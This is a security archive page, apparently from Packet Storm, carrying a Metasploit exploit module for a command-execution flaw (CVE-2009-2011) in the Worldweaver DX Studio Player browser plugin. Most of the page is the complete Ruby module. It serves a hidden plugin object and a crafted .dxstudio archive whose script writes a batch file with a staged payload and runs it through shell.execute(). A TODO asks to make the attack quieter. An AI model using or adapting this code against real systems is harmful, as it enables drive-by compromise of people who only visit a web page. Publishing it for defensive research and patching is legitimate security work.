what you don't know can hurt you

Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution

Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution
Posted Feb 17, 2010
Authored by jduck | Site metasploit.com

This Metasploit module exploits a command execution vulnerability within the DX Studio Player from Worldweaver. The player is a browser plugin for IE (ActiveX) and Firefox (dll). When an unsuspecting user visits a web page referring to a specially crafted .dxstudio document, an attacker can execute arbitrary commands. Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20 and IE 6 on Windows XP SP3. In IE, the user will be prompted if they wish to allow the plug-in to access local files. This prompt appears to occur only once per server host. NOTE: This exploit uses additionally dangerous script features to write to local files!

tags | exploit, web, arbitrary, local, activex
systems | windows, xp
advisories | CVE-2009-2011
MD5 | a5e34c10bb1819af3e1f8e7223de5072

Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution

Change Mirror Download
##
# $Id: dxstudio_player_exec.rb 8541 2010-02-17 20:14:40Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex/zip'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::CmdStager

def initialize(info = {})
super(update_info(info,
'Name' => 'Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution',
'Description' => %q{
This module exploits a command execution vulnerability within the
DX Studio Player from Worldweaver. The player is a browser plugin for
IE (ActiveX) and Firefox (dll). When an unsuspecting user visits a web
page referring to a specially crafted .dxstudio document, an attacker can
execute arbitrary commands.

Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20 and
IE 6 on Windows XP SP3. In IE, the user will be prompted if they wish to allow
the plug-in to access local files. This prompt appears to occur only once per
server host.

NOTE: This exploit uses additionally dangerous script features to write to
local files!
},
'License' => MSF_LICENSE,
'Author' => [ 'jduck' ],
'Version' => '$Revision: 8541 $',
'References' =>
[
[ 'CVE', '2009-2011' ],
[ 'BID', '35273' ],
[ 'OSVDB', '54969' ],
[ 'URL', 'http://www.exploit-db.com/exploits/8922' ],
[ 'URL', 'http://dxstudio.com/guide.aspx' ]
],
'Payload' =>
{
'Space' => 2048,
},
'Platform' => 'win',
# 'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Automatic', { } ],
],
'DisclosureDate' => 'Jun 09 2009',
'DefaultTarget' => 0))
end

def on_request_uri(cli, request)

url_base = "http://"
url_base += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
url_base += ":" + datastore['SRVPORT'] + get_resource()

payload_url = url_base + "/payload"

# handle request for the payload
if (request.uri.match(/payload/))

# build the payload
return if ((p = regenerate_payload(cli)) == nil)
data = Msf::Util::EXE.to_win32pe(framework, p.encoded)

cmds = generate_cmdstager({}, 2047, p)
scr = ""
cmds.each_line { |ln|
ln.chomp!
scr << " f.writeString('"
scr << ln
scr << "\\n');\n"
}

# make header.xml
hdrxml = %Q|<?xml version="1.0"?>
<dxstudio>
<script><![CDATA[function onInit()
{
var f=system.file.openWrite("BATNAME");
f.writeString('@echo off\\n');
CMDS
f.close();
shell.execute("BATNAME");
}]]>
</script>
</dxstudio>
|
hdrxml.gsub!(/CMDS/, scr);
bat_name = rand_text_alphanumeric(rand(32)) + ".bat"
hdrxml.gsub!(/BATNAME/, bat_name);

# craft the zip archive
zip = Rex::Zip::Archive.new
zip.add_file("header.xml", hdrxml)
data = zip.pack

print_status("Sending file.dxstudio payload to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })

# Handle the payload
# handler(cli)
return
end

# otherwise, send the html..
html = %Q|<html>
<body>
<div height=100%>
Please wait...
</div>
<object width=1 height=1 classid='clsid:0AC2706C-8623-46F8-9EDD-8F71A897FDAE'>
<param name="src" value="DXURL" />
<embed width=1 height=1 src=DXURL type="application/x-dxstudio">
</embed>
</object>
</body>
</html>
|

print_status("Sending #{self.name} HTML to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the compressed response to the client
html.gsub!(/DXURL/, payload_url)
send_response(cli, html, { 'Content-Type' => 'text/html' })

end
end

=begin
TODO:
- make it more quiet
- auto-migrate?
=end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close